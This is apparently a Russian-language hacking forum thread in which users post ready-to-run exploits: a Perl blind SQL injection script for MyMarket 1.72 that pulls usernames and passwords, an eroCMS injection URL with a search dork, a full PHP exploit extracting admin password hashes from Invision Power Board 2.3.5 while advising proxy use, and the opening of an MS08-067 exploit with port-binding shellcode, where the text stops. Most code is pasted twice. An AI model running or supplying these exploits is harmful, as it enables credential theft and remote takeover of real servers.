Exploit Get SYSTEM SHELL PORT 8080
WindowsXP Version SP2+ Kaspersky Internet Security 6.0.0.303
WindowsXP Version SP2+ Kaspersky Internet Security 6.0.0.303
Love.sys
15.11.2006 - 2:21
kolovrat
28.03.2007 - 14:47
В Сети опубликован код эксплойта, использующего уязвимость в Microsoft IE. Код опубликован человеком с ником Milw0rm на своей одноименной веб-странице.
Уязвимость, которую использует эксплойт, может использоваться для несанкционированного запуска программного кода на компьютере на целевом компьютере, на котором не установлен соответствующий патч от Microsoft.
Уязвимость была обнаружена довольно давно security-экспертом HD Moore, и еще в июле прошлого года им же был опубликован код, вызывающий «крах» браузера. Microsoft выпустила соответствующее обновление в феврале 2007 года, но, по мнению аналитиков WebSense, уязвимость все еще актуальна и хакеры еще раз обратят на нее пристальное внимание в связи с выходом эксплойта.
Эксперты eEye отметили, что код Milw0rm работает для IE 6, но не функционирует под IE 7, и сообщили, что обновленная версия эксплойта, работающая и для новейшего браузера, будет опубликована позднее.
Оригинальный код эксплойта использует ошибку в функции NextRecordset() библиотеки msado15.dll и, в случае успеха, запускает calc.exe.
Уязвимость, которую использует эксплойт, может использоваться для несанкционированного запуска программного кода на компьютере на целевом компьютере, на котором не установлен соответствующий патч от Microsoft.
Уязвимость была обнаружена довольно давно security-экспертом HD Moore, и еще в июле прошлого года им же был опубликован код, вызывающий «крах» браузера. Microsoft выпустила соответствующее обновление в феврале 2007 года, но, по мнению аналитиков WebSense, уязвимость все еще актуальна и хакеры еще раз обратят на нее пристальное внимание в связи с выходом эксплойта.
Эксперты eEye отметили, что код Milw0rm работает для IE 6, но не функционирует под IE 7, и сообщили, что обновленная версия эксплойта, работающая и для новейшего браузера, будет опубликована позднее.
Оригинальный код эксплойта использует ошибку в функции NextRecordset() библиотеки msado15.dll и, в случае успеха, запускает calc.exe.
Teshka
13.11.2007 - 7:28
Цель: Microsoft Internet Explorer
Воздействие: Выполнение произвольного кода
Воздействие: Выполнение произвольного кода
de1ay
18.06.2008 - 15:12
MyMarket 1.72
Mambo Component galleries 1.0 (aid) Remote SQL Injection Vulnerability
Цитата | Quote
#http://www.site.de/my...ping/?id=bluah
#Ok when we give $id an unexpected value like this we get an SQL Error.
#Union selecting seems not possible...
#Exploit needs a valid category id.
#The Password is in md5 so exploiting will take an awful lot of time.
#You will have to change the content on some sites if there are no categorys.
#So I couldnt make it to write a stable expl for all sites using this.
#
#SQL Injection:
#http://[target]/[path]/?id=[SQL]
#Ok when we give $id an unexpected value like this we get an SQL Error.
#Union selecting seems not possible...
#Exploit needs a valid category id.
#The Password is in md5 so exploiting will take an awful lot of time.
#You will have to change the content on some sites if there are no categorys.
#So I couldnt make it to write a stable expl for all sites using this.
#
#SQL Injection:
#http://[target]/[path]/?id=[SQL]
» сплойт «
Code
#!/usr/bin/perl
######################
#
#MyMarket 1.72 Blind SQL Injection Exploit
#
######################
#
#Bug by: h0yt3r
#
#Demo: http://mymarket.sourceforge.net/demo/shopping/
#
##
###
##
#
#http://www.site.de/mymarket/shopping/?id=bluah
#Ok when we give $id an unexpected value like this we get an SQL Error.
#Union selecting seems not possible...
#Exploit needs a valid category id.
#The Password is in md5 so exploiting will take an awful lot of time.
#You will have to change the content on some sites if there are no categorys.
#So I couldnt make it to write a stable expl for all sites using this.
#
#SQL Injection:
#http://[target]/[path]/?id=[SQL]
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the foreverliving h4ck-y0u Team!
#
#######################
#######################
use LWP::UserAgent;
my $userAgent = LWP::UserAgent->new;
usage();
$server = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
print"\n";
if (!$id) { die "Read Usage!\n"; }
$filename ="index.php";
my $vulnCheck = "http://".$server.$dir.$filename;
my $goodSite = $vulnCheck."?id=".$id." and 1=1";
my $badSite = $vulnCheck."?id=".$id." and 1=0";
print"[x]Connecting:";
my $Attack1= $userAgent->get($goodSite);
my $Attack2= $userAgent->get($badSite);
if($Attack1->is_success)
{
print " Connected \n";
print "[x]Vulnerable Check: ";
###Will change some times
if($Attack1->content !~ m/None /i && $Attack2->content =~ m/None/i)
{ print "Vulnerable \n"; }
else
{ print "Not Vulnerable"; exit;}
}
else
{
print " Connection Failed";
exit;
}
my $asciiNUM="";
my $length;
print "[x]Bruteforcing Length...(if this freezes you have to change the content)\n";
my $lengthCounter = 1;
while(1)
{
my $url = "".$vulnCheck."?id=".$id."%20and%20LENGTH((select%20concat(username,0x3a,password)%20from%20users%20limit%200,1))=".$lengthCounter."";
my $Attack= $userAgent->get($url);
my $content = $Attack->content;
if($content =~ m/None/i)
{ $lengthCounter++; }
else
{ $length=$length.$lengthCounter; last; }
}
my @Daten = ("61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76","77","78","79","7A","3A","5F","31","32","33","34","35","36","37","38","39","30","21","23","2B","28","29","40","2D","F5","25","26","2F","3F");
print "[x]Injecting Black Magic...will take SOME time...\n";
for($b=1;$b<=$length;$b++)
{
for(my $u=0;$u<53;$u++)
{
my $url = "".$vulnCheck."?id=".$id."%20and%20substring((select%20concat(username,0x3a,password)%20from%20users%20limit%200,1),".$b.",1)=0x".$Daten[$u]."";
my $Attack= $userAgent->get($url);
my $content = $Attack->content;
if($content !~ m/None/i)
{
print "[x]Found Char ".$Daten[$u]."\n";
$hex=$hex.$Daten[$u];
last;
}
}
}
print "[x]Converting \n";
my $a_str = hex_to_ascii($hex);
@login = split(/\:/, $a_str);
print "[x]Success! \n";
print " Username: $login[0]\n";
print " Password: $login[1]";
sub hex_to_ascii ($)
{
(my $str = shift) =~ s/([a-fA-F0-9]{2})/chr(hex $1)/eg;
return $str;
}
sub usage()
{
print q
{
######################################################
MyMarket Remote Blind SQL Injection Exploit
-Written by h0yt3r-
Usage: MyMarket.pl [Server] [Path] [Category ID]
Sample:
perl MyMarket.pl www.site.com /shopping/ 1
######################################################
};
}
######################
#
#MyMarket 1.72 Blind SQL Injection Exploit
#
######################
#
#Bug by: h0yt3r
#
#Demo: http://mymarket.sourceforge.net/demo/shopping/
#
##
###
##
#
#http://www.site.de/mymarket/shopping/?id=bluah
#Ok when we give $id an unexpected value like this we get an SQL Error.
#Union selecting seems not possible...
#Exploit needs a valid category id.
#The Password is in md5 so exploiting will take an awful lot of time.
#You will have to change the content on some sites if there are no categorys.
#So I couldnt make it to write a stable expl for all sites using this.
#
#SQL Injection:
#http://[target]/[path]/?id=[SQL]
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the foreverliving h4ck-y0u Team!
#
#######################
#######################
use LWP::UserAgent;
my $userAgent = LWP::UserAgent->new;
usage();
$server = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
print"\n";
if (!$id) { die "Read Usage!\n"; }
$filename ="index.php";
my $vulnCheck = "http://".$server.$dir.$filename;
my $goodSite = $vulnCheck."?id=".$id." and 1=1";
my $badSite = $vulnCheck."?id=".$id." and 1=0";
print"[x]Connecting:";
my $Attack1= $userAgent->get($goodSite);
my $Attack2= $userAgent->get($badSite);
if($Attack1->is_success)
{
print " Connected \n";
print "[x]Vulnerable Check: ";
###Will change some times
if($Attack1->content !~ m/None /i && $Attack2->content =~ m/None/i)
{ print "Vulnerable \n"; }
else
{ print "Not Vulnerable"; exit;}
}
else
{
print " Connection Failed";
exit;
}
my $asciiNUM="";
my $length;
print "[x]Bruteforcing Length...(if this freezes you have to change the content)\n";
my $lengthCounter = 1;
while(1)
{
my $url = "".$vulnCheck."?id=".$id."%20and%20LENGTH((select%20concat(username,0x3a,password)%20from%20users%20limit%200,1))=".$lengthCounter."";
my $Attack= $userAgent->get($url);
my $content = $Attack->content;
if($content =~ m/None/i)
{ $lengthCounter++; }
else
{ $length=$length.$lengthCounter; last; }
}
my @Daten = ("61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76","77","78","79","7A","3A","5F","31","32","33","34","35","36","37","38","39","30","21","23","2B","28","29","40","2D","F5","25","26","2F","3F");
print "[x]Injecting Black Magic...will take SOME time...\n";
for($b=1;$b<=$length;$b++)
{
for(my $u=0;$u<53;$u++)
{
my $url = "".$vulnCheck."?id=".$id."%20and%20substring((select%20concat(username,0x3a,password)%20from%20users%20limit%200,1),".$b.",1)=0x".$Daten[$u]."";
my $Attack= $userAgent->get($url);
my $content = $Attack->content;
if($content !~ m/None/i)
{
print "[x]Found Char ".$Daten[$u]."\n";
$hex=$hex.$Daten[$u];
last;
}
}
}
print "[x]Converting \n";
my $a_str = hex_to_ascii($hex);
@login = split(/\:/, $a_str);
print "[x]Success! \n";
print " Username: $login[0]\n";
print " Password: $login[1]";
sub hex_to_ascii ($)
{
(my $str = shift) =~ s/([a-fA-F0-9]{2})/chr(hex $1)/eg;
return $str;
}
sub usage()
{
print q
{
######################################################
MyMarket Remote Blind SQL Injection Exploit
-Written by h0yt3r-
Usage: MyMarket.pl [Server] [Path] [Category ID]
Sample:
perl MyMarket.pl www.site.com /shopping/ 1
######################################################
};
}
Mambo Component galleries 1.0 (aid) Remote SQL Injection Vulnerability
» Нажмите, для открытия спойлера | Press to open the spoiler «
#########################################################################
#################### Viva IslaM Viva IslaM ##############################
##
## Remote SQL Injection Vulnerability
##
## eroCMS V1.0 - V1.1 - V1.2 - V1.3 - V1.4 ( index.php site )
##
#########################################################################
#########################################################################
##
## AuTh0r : Mr.SQL
##
## H0ME : WwW.PaL-HaCkEr.CoM
##
## Email : [email protected]
##
## !! SYRIAN HaCkErS !!
########################
########################
##
## Script : eroCMS
##
## Vesrion : 1.0 - 1.1 - 1.2 - 1.3 - 1.4
##
## site : www.erocms.de
##
########################
########################
##
## D0rk : "by eroCMS"
##
##
## -(:: SQL :
-
##
## www.site.com/
## index.php?site=-1'+union+select+1,2,concat_ws(0x3a,passwort,email),4,5+from+members+limit+1,1/*
##
## -(:: L!VE DEMO :-
##
##
http://demo.erocms.de...rs+limit+1,1/*
##
#######################
#######################
-(:: NOTE :-
maybe table users ( members )
columns ( , passwort , email , ) get the user column , USE group by , (( This porno script ))
################################################################################
#######################
################################################################################
#######################
-(:: !Gr3E3E3E3E3E3E3TzZ! :-
:: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::
################################################################################
#######################
################################################################################
#######################
# milw0rm.com [2008-06-17]
#################### Viva IslaM Viva IslaM ##############################
##
## Remote SQL Injection Vulnerability
##
## eroCMS V1.0 - V1.1 - V1.2 - V1.3 - V1.4 ( index.php site )
##
#########################################################################
#########################################################################
##
## AuTh0r : Mr.SQL
##
## H0ME : WwW.PaL-HaCkEr.CoM
##
## Email : [email protected]
##
## !! SYRIAN HaCkErS !!
########################
########################
##
## Script : eroCMS
##
## Vesrion : 1.0 - 1.1 - 1.2 - 1.3 - 1.4
##
## site : www.erocms.de
##
########################
########################
##
## D0rk : "by eroCMS"
##
##
## -(:: SQL :
-##
## www.site.com/
## index.php?site=-1'+union+select+1,2,concat_ws(0x3a,passwort,email),4,5+from+members+limit+1,1/*
##
## -(:: L!VE DEMO :
-##
##
http://demo.erocms.de...rs+limit+1,1/*
##
#######################
#######################
-(:: NOTE :
-maybe table users ( members )
columns ( , passwort , email , ) get the user column , USE group by
, (( This porno script ))################################################################################
#######################
################################################################################
#######################
-(:: !Gr3E3E3E3E3E3E3TzZ! :
-:: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::
################################################################################
#######################
################################################################################
#######################
# milw0rm.com [2008-06-17]
de1ay
26.09.2008 - 9:10
Invision Power Board <= 2.3.5 Remote SQL Injection Exploit
» Нажмите, для открытия спойлера | Press to open the spoiler «
Code
<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// IPB <= 2.3.5 sql injection exploit
// Version 1.0
// written by Janek Vind "waraxe"
// Estonia, Tartu
// http://www.waraxe.us/
// 20. september 2008
// based on DarkFig's advisory
// http://acid-root.new.fr/?0:18
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_POST, so no suspicious logs
// 3. Pretesting saves time if IPB is not vulnerable
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//============
$url = 'http://localhost/ipb.2.3.5/';
$id = 1;// ID of the target user, default value "1" is admin's ID
$prefix = 'ibf_';// IPB table prefix, default is "ibf_"
# Proxy settings
# Be sure to use proxy :)
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
$outfile = './ipblog.txt';// Log file
//=============
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff;)
///////////////////////////////////////////////////////////////////////
//============
///////////////////////////////////////////////////////////////////////
$cli = php_sapi_name() === 'cli';
//============
// Warning, if executed from webserver
//============
if(!$cli)
{
if(!isset($_REQUEST['wtf-is-cli']))
{
echo "<html><head><title>Attention!</title></head>\n";
echo "<body><br /><br /><center>\n";
echo "<h1>Warning!</h1>\n";
echo "This exploit is meant to be used as php CLI script!<br />\n";
echo "More information:<br />\n";
echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
echo "Still, you can try to run it from webserver.<br />\n";
echo "Just press the button below and prepare for long waiting<br />\n";
echo "And learn to use php CLI next time, please ...<br />\n";
echo "<form method=\"get\">\n";
echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
echo "</form>\n";
echo "</center></body></html>\n";
exit;
}
else
{
// Let's try to maximize our chances without CLI
@set_time_limit(0);
}
}
//============
xecho("Target: $url\n");
xecho("Sql table prefix: $prefix\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
xecho("Testing target ID ... \n");
test_target_id();
xecho("Target ID seems to be valid\n");
$hash = get_hash();
$salt = get_salt();
add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");
add_line("Salt: $salt");
add_line("-------");
xecho("\n-------\n");
xecho("Hash: $hash\n");
xecho("Salt: $salt");
xecho("\n-------\n");
xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");
die("See ya! :) \n");
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
global $url;
$post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
$buff = trim(make_post($url, $post, '', $url));
if($buff !== 'found')
{
die('Invalid response, target URL not valid? Exiting ...');
}
}
//////////////////////////////////////////////////////////////////////
function test_target_id()
{
global $url, $prefix, $id;
$post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';
if(!test_condition($post))
{
die('Invalid response, target ID not valid? Exiting ...');
}
}
///////////////////////////////////////////////////////////////////////
function get_salt()
{
$len = 5;
$out = '';
xecho("Finding salt ...\n");
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_saltchar($i);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current salt: $out \n");
}
xecho("\nFinal salt: $out\n\n");
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_saltchar($pos)
{
global $prefix, $id;
$char = '';
$min = 32;
$max = 128;
$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$post = $pattern . '%253e' . $curr;
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
xecho("Current test: $curr-$max-$min\n");
}
return $char;
}
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$out = '';
xecho("Finding hash ...\n");
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($i);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current hash: $out \n");
}
xecho("\nFinal hash: $out\n\n");
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($pos)
{
global $prefix, $id;
$char = '';
$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";
// First let's determine, if it's number or letter
$post = $pattern . '%253e57';
$letter = test_condition($post);
if($letter)
{
$min = 97;
$max = 102;
xecho("Char to find is [a-f]\n");
}
else
{
$min = 48;
$max = 57;
xecho("Char to find is [0-9]\n");
}
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$post = $pattern . '%253e' . $curr;
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
xecho("Current test: $curr-$max-$min\n");
}
return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url;
$bret = false;
$maxtry = 10;
$try = 1;
$pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
$post = sprintf($pattern, $p);
while(1)
{
$buff = trim(make_post($url, $post, '', $url));
if($buff === 'found')
{
$bret = true;
break;
}
elseif($buff === 'notfound')
{
break;
}
elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
{
die("Sql error! Wrong prefix?\nExiting ... ");
}
else
{
xecho("test_condition() - try $try - invalid return value ...\n");
$try ++;
if($try > $maxtry)
{
die("Too many tries - exiting ...\n");
}
else
{
xecho("Trying again - try $try ...\n");
}
}
}
return $bret;
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)');
if(!empty($GLOBALS['proxy_ip_port']))
{
curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
if(!empty($GLOBALS['proxy_user_password']))
{
curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
}
}
if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}
if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}
if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}
$fc = curl_exec($ch);
curl_close($ch);
return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($line)
{
global $outfile;
$line .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $line);
fclose($fh);
}
///////////////////////////////////////////////////////////////////////
function xecho($line)
{
if($GLOBALS['cli'])
{
echo "$line";
}
else
{
$line = nl2br(htmlspecialchars($line));
echo "$line";
}
}
//////////////////////////////////////////////////////////////////////
?>
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// IPB <= 2.3.5 sql injection exploit
// Version 1.0
// written by Janek Vind "waraxe"
// Estonia, Tartu
// http://www.waraxe.us/
// 20. september 2008
// based on DarkFig's advisory
// http://acid-root.new.fr/?0:18
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_POST, so no suspicious logs
// 3. Pretesting saves time if IPB is not vulnerable
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//============
$url = 'http://localhost/ipb.2.3.5/';
$id = 1;// ID of the target user, default value "1" is admin's ID
$prefix = 'ibf_';// IPB table prefix, default is "ibf_"
# Proxy settings
# Be sure to use proxy :)
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
$outfile = './ipblog.txt';// Log file
//=============
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff;)
///////////////////////////////////////////////////////////////////////
//============
///////////////////////////////////////////////////////////////////////
$cli = php_sapi_name() === 'cli';
//============
// Warning, if executed from webserver
//============
if(!$cli)
{
if(!isset($_REQUEST['wtf-is-cli']))
{
echo "<html><head><title>Attention!</title></head>\n";
echo "<body><br /><br /><center>\n";
echo "<h1>Warning!</h1>\n";
echo "This exploit is meant to be used as php CLI script!<br />\n";
echo "More information:<br />\n";
echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
echo "Still, you can try to run it from webserver.<br />\n";
echo "Just press the button below and prepare for long waiting<br />\n";
echo "And learn to use php CLI next time, please ...<br />\n";
echo "<form method=\"get\">\n";
echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
echo "</form>\n";
echo "</center></body></html>\n";
exit;
}
else
{
// Let's try to maximize our chances without CLI
@set_time_limit(0);
}
}
//============
xecho("Target: $url\n");
xecho("Sql table prefix: $prefix\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
xecho("Testing target ID ... \n");
test_target_id();
xecho("Target ID seems to be valid\n");
$hash = get_hash();
$salt = get_salt();
add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");
add_line("Salt: $salt");
add_line("-------");
xecho("\n-------\n");
xecho("Hash: $hash\n");
xecho("Salt: $salt");
xecho("\n-------\n");
xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");
die("See ya! :) \n");
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
global $url;
$post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
$buff = trim(make_post($url, $post, '', $url));
if($buff !== 'found')
{
die('Invalid response, target URL not valid? Exiting ...');
}
}
//////////////////////////////////////////////////////////////////////
function test_target_id()
{
global $url, $prefix, $id;
$post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';
if(!test_condition($post))
{
die('Invalid response, target ID not valid? Exiting ...');
}
}
///////////////////////////////////////////////////////////////////////
function get_salt()
{
$len = 5;
$out = '';
xecho("Finding salt ...\n");
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_saltchar($i);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current salt: $out \n");
}
xecho("\nFinal salt: $out\n\n");
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_saltchar($pos)
{
global $prefix, $id;
$char = '';
$min = 32;
$max = 128;
$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$post = $pattern . '%253e' . $curr;
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
xecho("Current test: $curr-$max-$min\n");
}
return $char;
}
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$out = '';
xecho("Finding hash ...\n");
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($i);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current hash: $out \n");
}
xecho("\nFinal hash: $out\n\n");
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($pos)
{
global $prefix, $id;
$char = '';
$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";
// First let's determine, if it's number or letter
$post = $pattern . '%253e57';
$letter = test_condition($post);
if($letter)
{
$min = 97;
$max = 102;
xecho("Char to find is [a-f]\n");
}
else
{
$min = 48;
$max = 57;
xecho("Char to find is [0-9]\n");
}
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$post = $pattern . '%253e' . $curr;
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
xecho("Current test: $curr-$max-$min\n");
}
return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url;
$bret = false;
$maxtry = 10;
$try = 1;
$pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
$post = sprintf($pattern, $p);
while(1)
{
$buff = trim(make_post($url, $post, '', $url));
if($buff === 'found')
{
$bret = true;
break;
}
elseif($buff === 'notfound')
{
break;
}
elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
{
die("Sql error! Wrong prefix?\nExiting ... ");
}
else
{
xecho("test_condition() - try $try - invalid return value ...\n");
$try ++;
if($try > $maxtry)
{
die("Too many tries - exiting ...\n");
}
else
{
xecho("Trying again - try $try ...\n");
}
}
}
return $bret;
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)');
if(!empty($GLOBALS['proxy_ip_port']))
{
curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
if(!empty($GLOBALS['proxy_user_password']))
{
curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
}
}
if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}
if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}
if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}
$fc = curl_exec($ch);
curl_close($ch);
return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($line)
{
global $outfile;
$line .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $line);
fclose($fh);
}
///////////////////////////////////////////////////////////////////////
function xecho($line)
{
if($GLOBALS['cli'])
{
echo "$line";
}
else
{
$line = nl2br(htmlspecialchars($line));
echo "$line";
}
}
//////////////////////////////////////////////////////////////////////
?>
de1ay
19.11.2008 - 23:27
MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)
Пока не тестил, но, как я понял, открывает телнет соединение с атакуемым компьютером.
Пока не тестил, но, как я понял, открывает телнет соединение с атакуемым компьютером.
» expl «
#!/usr/bin/env python
#############################################################################
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
#############################################################################
import struct
import sys
from threading import Thread #Thread is imported incase you would like to modify
#the src to run against multiple targets.
try:
from impacket import smb
from impacket import uuid
from impacket.dcerpc import dcerpc
from impacket.dcerpc import transport
except ImportError, _:
print 'Install the following library to make this script work'
print 'Impacket :
http://oss.coresecuri...cket.html'
print 'PyCrypto :
http://www.amk.ca/python/code/crypto.html'
sys.exit(1)
print '#######################################################################'
print '# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '# www.hackingspirits.com'
print '# www.coffeeandsecurity.com'
print '# Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################\n'
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
